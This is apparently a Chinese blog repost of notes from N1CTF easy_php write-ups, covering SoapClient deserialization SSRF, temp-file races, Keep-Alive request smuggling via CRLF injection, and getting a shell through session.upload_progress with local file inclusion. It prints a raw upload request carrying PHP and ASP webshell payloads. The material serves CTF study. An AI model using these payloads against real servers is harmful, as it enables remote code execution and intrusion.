本文主要是介绍从N1CTF easy_php学到的几个骚操作,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
认真的拜读了师傅们关于N1CTF
的各种writeup
,收获了不少骚操作,记录下以备查找。
反序列化点SoapClient php自带类的利用
#使用的是SoapClient这个php自带类
# 当反序列化出来的对象调用不存在的函数是,就会调用__call方法,向外发送请求
$a = new SoapClient(null, array('location'=> "xxx.xxx.xxx.xxx:8000", 'uri'=> "123"
));
$res = serialize($a);
echo $res;
$a = unserialize($res);
$a->getsubtime();
测试:
/tmp/临时文件竞争
要使用临时文件竞争,phpinfo
的环境要有如下配置:
它大概的原理就是趁系统还没把临时文件删除之前将这个文件包含起来,从而getshell
,通常系统的守护进行删除时隔很小,大概在2~3s,所以,我们要使用多线程上传,然后不断刷新包含文件。
Connection: Keep-Alive二次请求
当第一个请求的Connection
为Keep-Alive
的时候,接着的那个请求也会被响应。也就是说在一次HTTP
连接中可以同时又多个HTTP
请求头和请求体,但是当前请求被响应的前提是,前一个请求有Connection: Keep-Alive
。 (测试的时候需要注意Content-Length
字段,需把burp
中的repeater->update content-length
选项关掉)
这里就也给了我们一个很重要的启示,如果我们遇到一个GET
型的CRLF
注入,但是我们需要的却是一个POST
类型的请求,就可以用这种方式,在第一个请求中注入一个Connection: Keep-Alive
,然后接着往下注入第二个请求,就可以实现我们的目的。
测试代码:
#alive.php
<?php
print_r($_GET);
print_r($_POST);
sessions.upload_progress结合LFI getshell
当 session.upload_progress.enabled INI
选项开启时,PHP
能够在每一个文件上传时监测上传进度
参考资料:
基于session.upload_progress 的文件上传进度显示
Session 上传进度
本地使用wamp
集成环境来做相应演示
session.upload_progress.enabled
这个参数在php.ini
默认开启,需要手动置为Off
增加phpinfo.php
页面
<?php
phpinfo();
?>
通过 phpinfo.php
文件中很明显可见:
同时可见存储路径:
本地构造上传点,用burp抓包进行重发包
POST / HTTP/1.1
Host: 127.0.0.1:80
Proxy-Connection: keep-alive
Content-Length: 648
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary2rwkUEtFdqhGMHqV
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=5uu8r952rejihbg033m5mckb17------WebKitFormBoundary2rwkUEtFdqhGMHqV
Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS"<?=`echo '<?php eval($_REQUEST[bertram])?>'>bertram.php`?>
------WebKitFormBoundary2rwkUEtFdqhGMHqV
Content-Disposition: form-data; name="file2"; filename="1.php"
Content-Type: text/php<?php eval($_POST[1]);?>------WebKitFormBoundary2rwkUEtFdqhGMHqV
Content-Disposition: form-data; name="file1"; filename="2.asp"
Content-Type: application/octet-stream< %eval request("a")%>------WebKitFormBoundary2rwkUEtFdqhGMHqV
Content-Disposition: form-data; name="submit"Submit
------WebKitFormBoundary2rwkUEtFdqhGMHqV--
服务器就会在.E:/wamp/tmp/sess_5uu8r952rejihbg033m5mckb17
中记录这个上传的文件。接着我们不断刷新生成包含恶意php
代码的文件,然后通过LFI包含这个文件
利用bash的特性,绕过删除
情景设计,在目录/var/tmp/
下一直执行命令rm *.jpg
,我们这是该如何才能上传图片上去?
root@VM-201-111-ubuntu:/var/tmp# dir
spider.py
systemd-private-62f616023488426cba41eeaab4c972d3-systemd-timesyncd.service-DcTg0v
systemd-private-c5c2ed65cd2d419ba9d17715ccaa40f6-systemd-timesyncd.service-o93nCB
test
-test.txt
root@VM-201-111-ubuntu:/var/tmp# rm -test.txt
rm: invalid option -- 't'
Try 'rm ./-test.txt' to remove the file '-test.txt'.
Try 'rm --help' for more information.
root@VM-201-111-ubuntu:/var/tmp#
这是因为 bash
在做*
符号展开之后,直接把-test.jpg
传给了rm
命令,然后rm
命令就把-
后面内容全部作为参数解析,导致命令执行失败。
所以只需要上传一个以-开头的文件,就删除不掉了。
这篇关于从N1CTF easy_php学到的几个骚操作的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!